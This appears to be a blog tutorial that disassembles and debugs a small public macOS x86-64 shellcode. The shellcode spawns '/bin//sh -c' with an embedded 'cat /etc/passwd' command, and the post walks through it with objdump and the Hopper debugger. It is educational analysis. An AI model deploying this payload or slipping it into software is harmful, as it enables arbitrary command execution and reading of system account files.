Abstract
In this series of articles, I am analysing the pieces of shellcode written by Odzhan on the page Shellcode: Mac OSX amd64.
In the last article, Come taste some shellcode..., we introduced some basic binary analysis and we learned how to call a syscall with no arguments. In this article, we will analyse how to work with more complex arguments.
I will also introduce the hopper disassembler (https://www.hopperapp.com/), one of the tools I use the most.
Execute a command
We start with the code:
; 43 bytes execute command
;
bits 64
global _main
_main:
push 59
pop rax ; eax = sys_execve
cdq ; edx = 0
bts eax, 25 ; eax = 0x0200003B
mov rbx, '/bin//sh'
push rdx ; 0
push rbx ; "/bin//sh"
push rsp
pop rdi ; rdi="/bin//sh", 0
; ---------
push rdx ; 0
push word '-c'
push rsp
pop rbx ; rbx="-c", 0
push rdx ; argv[3]=NULL
jmp l_cmd64
r_cmd64: ; argv[2]=cmd
push rbx ; argv[1]="-c"
push rdi ; argv[0]="/bin//sh"
push rsp
pop rsi ; rsi=argv
syscall
l_cmd64:
call r_cmd64
; put your command here followed by null terminator
db 'cat /etc/passwd',0
We compile and link it:
gbiondo@tripleX Odzhan % nasm -f macho64 cmdRun.asm
gbiondo@tripleX Odzhan % ld -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib -lSystem -o cmdRun cmdRun.o
and we can obviously run it. I will not - why should I disclose the users in my machine, anyway? - however, it runs perfectly on my MacOS Monterey.
A bit of static analysis
If you read this blog, the following commands should not be new to you. If not, you may want to read previous articles :) or do some man
around.
Getting information about the executable
gbiondo@tripleX Odzhan % file cmdRun
cmdRun: Mach-O 64-bit executable x86_64
No surprises here. Just compare the above with how we compiled the file.
Looking for C strings
There is none. in fact:
gbiondo@tripleX Odzhan % strings cmdRun
gbiondo@tripleX Odzhan %
Getting information about the sections
This is a very simple program, after all:
gbiondo@tripleX Odzhan % objdump -m --section-headers cmdRun
Sections:
Idx Name Size VMA Type
0 __text 0000003b 0000000100003f7d TEXT
1 __unwind_info 00000048 0000000100003fb8 DATA
Getting the symbol table
No big hint is given by the symbol table:
gbiondo@tripleX Odzhan % objdump -m --syms cmdRun
cmdRun:
SYMBOL TABLE:
0000000100003f9d l F __TEXT,__text r_cmd64
0000000100000000 g *ABS* __mh_execute_header
0000000100003f7d g F __TEXT,__text _main
Dynamic Analysis
Time for some debugging. This time we are using Hopper. This is not supposed to be a tutorial for hopper (which can be found here: https://www.hopperapp.com/tutorial.html or under the menu Help of the application).
Let's remember what an execve
-based shellcode must do:
- first parameter must be stored in
RDI
. It is a pointer to a string, holding the path of the executable. - second parameter must be stored in
RSI
. It is a pointer to a null-terminated array of strings, containing the parameters to the command. - third parameter must be stored in
RDX
. It is a pointer to a null-terminated array of strings, containing the environment variables.
I am choosing Select Debugger from the Debug menu, and I opt for the local debugger. I am then presented with this window:
Observe the "Controls" box. There are 10 buttons. From left to right, these are:
- Continue execution
- Pause execution
- Step into
- Step out
- Step over
- Continue until current position
- Continue until basic block end
- Trace procedure
- Stop execution
- Toggle breakpoint
Below, a Tab View controller can be seen. It contains four main areas we are interested into:
- General purpose registers (GPR)
- Memory
- Debugger Console
- Application Output
I also set a breakpoint at the beginning of the main
routine:
It's worthwhile to set some breakpoints around. At the beginning, we'll stop at each single instruction.
If we set a breakpoint to the very next instruction and we hit Continue execution twice, we'll notice how the contents of the RAX register changes (59 has been pushed to the stack and then popped to RAX).
Before:
After:
If we continue, there's the CDQ instruction. It sets RDX=0, since EAX is signed positive at the current point (see below).
Then the 25th bit is set to 1 - this technique should already be familiar to the reader, we won't illustrate it.
With the next instruction we can see something I love about Hopper. The instruction is illustrated below:
or, in plain text
movabs rbx, 0x68732f2f6e69622f
If we right click on the 0x68732f2f6e69622f
operand and select "Characters", we convert it into something more human readable (in this case, /bin//sh
). Good job, Hopper!
and RBX will be updated accordingly.
We hit continue, and first the contents of RDX (a zeroed register) and the contents of RBX (0x68732F2F6E69622F
, the string /bin//sh
) are pushed to the stack. After this, we obtain a null-terminated string containing /bin//sh
.
In fact, before running the instructions, RSP
, the stack pointer, points to 00007FF7BFEFFA68
. The contents of the memory can be seen in the third line of the memory dump of the image below:
Then RDX
is pushed and RSP
updated accordingly, so RSP
becomes 00007FF7BFEFFA60
. The stack is updated, see second line of the memory pane:
Finally RBX
is pushed and we have:
RSP
: contains00007FF7BFEFFA58
RBX
: contains68732F2F6E69622F
- and the stack is represented below
The contents of the stack are then popped in RDI
. Let's have a look at what we have after the instruction pop rdi
is executed:
Now the contents of RDX
are pushed in the stack, and then we push also the constant 0x632d
, which is the string -c
. See below:
The stack looks as follows:
The next instruction pushes the contents of rsp
in the stack, then the value is popped in rbx
:
Finally, the value of rdx
, which is null, is pushed into the stack. Now there's a noticeable difference between the original code, with two labels (r_cmd64
and l_cmd64
), and the code that's been first assembled and linked, then disassembled. Only r_cmd64
is present, and the instruction jmp r_cmd64+6
is used instead. When hit 'continue', the jump sends the control flow to 0x0000000100003FA3
which contains call r_cmd64
. Why jumping back and forth? The reason is that this way we place the pointer to the command string in the stack. Below there's the 'before'...
...and the 'after':
Now it's possible pushing rsp
and popping the value into rsi
:
and
Finally the syscall is invoked, and the execution of the shellcode terminates.
Conclusions
As strange as it may seem, I find easier working with lldb
- but I am an old guy :)
Hopper has powerful features anyway - I am using it for many other purposes (like changing memory contents on the fly).
We have shown how to approach some static and dinamic binary analysis for this kind of programs.
Finally: we start to understand assembly, but always having no talent and being proud of having none!